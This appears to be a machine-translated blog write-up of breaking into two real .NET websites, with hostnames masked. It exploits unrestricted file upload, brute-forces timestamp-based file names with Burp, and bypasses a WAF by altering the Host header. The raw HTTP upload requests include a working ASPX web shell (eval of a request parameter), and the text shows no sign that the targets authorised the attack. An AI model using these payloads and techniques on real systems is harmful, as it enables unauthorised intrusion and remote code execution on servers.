One file upload, two sites!

catalogue

Site 1: file upload

Site 2: file upload

If the article is helpful to you, you are welcome to pay attention, like and collect. One click three links support the following Oh!

If you want to communicate and learn together, you can add zkaq222 (note CSDN, but you can't pass it) to learn and make progress together

Site 1: file upload

Source code leaks found

Open your long cherished spicy chicken dictionary, scan and find that the bin.zip information is leaked, and try to conduct code audit
File location: SimpleDataPlatform.SimpleDataPlatform.fileUpload

Find ProccessRequest to receive the request. You can see that after obtaining a bunch of parameters (initialization), the HandleFiles method is entered

  Follow up HandleFiles for processing. If dateType=ZBJHSB, continue processing the request. dateType is GET parameter transfer

The path is / Uploads/SetData/ZBJHSB, the str name is timestamp, and STR2 (suffix) is not restricted  

OK, this should be a proper upload of any file. As long as there is a return value, the station will be gone. Unfortunately, it doesn't return a value.
Due to the method fileUpload, the file name is

fileUpload.aspx
fileUpload.ashx
fileUpload.asmx
fileUploads.aspx
fileUploads.asmx
fileUploads.ashx
Upload.....etc.

In addition, his existing dictionary exploded and successfully found the file name of 200 returned http://xxx.com:6039/FileUploads.ashx

Directly construct the upload Form. The name field in the Form should not be specifically set (not found in the code). After contracting, it returns 200. May it really be passed on?

POST /FileUploads.ashx?DataType=ZBJHSB HTTP/1.1
Host: xxx.cn:6039
Content-Length: 195
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarySVkAJfiOUeRxhsu8
Accept: */*
Connection: close

------WebKitFormBoundarySVkAJfiOUeRxhsu8
Content-Disposition: form-data; name="File"; filename="1.aspx"
Content-Type: image/jpeg

11111111111
------WebKitFormBoundarySVkAJfiOUeRxhsu8--

 

Previously, we saw that the format used is yyyymmddhhmmsfff as the file name, and then directly intercept the suffix as ext. moreover, we have a specific path, so we only need to explode the timestamp file name to win the site. We haven't done this before. We might as well try it.

Burst timestamp

Use Powershell to generate a timestamp, and then press go at Burp to send the request package
powershell -c Get-Date -Format yyyyMMddHHmmssfff

Then blast the last 5 digits, that is, ssfff (because the time on the computer may not be accurate, sometimes even 6 digits may be blasted)
I don't know how long I've been waiting

 

Good luck. I won't say much later.

Site 2: file upload

Find upload interface

Open website http://xxxx:880/zwwpt/#/ A webpack was found   debug mode is not closed. Check JS and find the upload interface

http://xxxxxx:880/zwwpt/data/menuData.json
A hidden html page is found, which cannot be found in the front function node

 

http://xxxxxx:880/jtwxt/xgjt/security_risk.html
Click the attachment to upload the packet capture

 

It is found that there is a waf. When the waf is intercepted, 404 will be returned. This is probably the case with the data packet (some other useless parameters are omitted)

POST /jtwpt/Ashxs/BaseInfoTransfer.ashx HTTP/1.1
Host: xxxxx.cn:880
Cookie: Hm_lvt_a8b89d1c622d63c547c83ec412cc50ef=1631849663; Hm_lvt_69968305fa176c802589452987ebddc8=1631858810
Connection: close

------WebKitFormBoundary7PCqG5iQ5vwLZ6AB
Content-Disposition: form-data; name="uploadfile[]"; filename="1.aspx"
Content-Type: image/jpeg

<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>

------WebKitFormBoundary7PCqG5iQ5vwLZ6AB--

 

bypass

Modify HOST:
xxxx.cn:880 is xxxx.cn or xxx.cn:8888 (ports other than 880 should be OK)

POST /jtwpt/Ashxs/BaseInfoTransfer.ashx HTTP/1.1
Host: xxxxx.cn
Cookie: Hm_lvt_a8b89d1c622d63c547c83ec412cc50ef=1631849663; Hm_lvt_69968305fa176c802589452987ebddc8=1631858810
Connection: close

------WebKitFormBoundary7PCqG5iQ5vwLZ6AB
Content-Disposition: form-data; name="uploadfile[]"; filename="1.aspx
Content-Type: image/jpeg

1111
------WebKitFormBoundary7PCqG5iQ5vwLZ6AB--

  Successfully bypassed waf and uploaded successfully, but there is no return path

10

Find path

However, the / uploads / directory and / image / directory were found earlier

1

 

And found that the html is called security_risk.html, construct paths securityrisk and security_risk, security, etc., and then ran the directory
Finally found to exist   http://xxx.cn:880/uploads/securityrisk/   This directory

 

Guess that the file that may be uploaded is probably in this directory, otherwise there is no need to have such a name, and it is also called upload, so try to directly access the file name 1.txt, and the return is 404
http://xxx.cn:880/uploads/securityrisk/1.txt 

14

Burst timestamp

According to my humble experience, dot.net websites like to use time stamps for naming, so construct the current time stamp and try to explode the time stamp value at the time point near the upload time.
The timestamp is generally 10 bits or 13 bits

 

The naming rules of forced conversion file names after file upload are generally
1. Random string
We can't guess this type in xxx-xxx-xxx--xxx.jpg format. If there is no directory traversal or return path, we can basically give up

2. Timestamp type

Directly timestamp+.jpg Is the file name (e.g. 16318676.jpg)
time stamp+00001
 time stamp+0001
 time stamp+001
 time stamp+01
 time stamp

3. yymmddHHmm type
This type is generally in the format of 20210917xxxxx. xxxx should be a number at the millisecond level. We can directly use Burp for explosive running. 4-6 bits can still run, and no more can run.
powershell -c Get-Date -Format yyyyMMddHHmm

 

yyyyMMddHHmmssfff
yyyyMMddHHmmssfff+00001
yyyyMMddHHmmssfff+0001
yyyyMMddHHmmssfff+001
yyyyMMddHHmmssfff+01
yyyyMMddHHmmssfff

yyyyMMddHHmmss
yyyyMMddHHmmss+00001
yyyyMMddHHmmss+0001
yyyyMMddHHmmss+001
yyyyMMddHHmmss+01
yyyyMMddHHmmss

After sorting out the ideas, let's start blasting. We just need to remember the current time when Burp contracts, obtain the current timestamp, and then use Burp intruder blasting to run. Sorting the past one by one requires about 15 repetitions. Each time I choose the last 5 digits for blasting (there should be no problem with each type as long as the website is not linked and omitted)

After a large amount of blasting, the uploaded text file was found, with the format and content of
yyyyMMddHHmmss+0001
After successfully finding the path, there is no need to talk about the following

However, this method still depends on luck, because it is likely that the time of the current server is inconsistent with that of the target website, such as a few hours or even a few days.
   If yes yyyyMMddHHmmssfff In this case, there's basically no way. I think I'm unlucky
   If it is yyyyMMddHHmmss In this case, it is possible to explode the 6-digit number.

  So far, both stations have got permission

 

 

 

 

 

 

Tags: PHP Python security penetration test Web Security

Posted on Mon, 25 Oct 2021 22:50:08 -0400 by tnan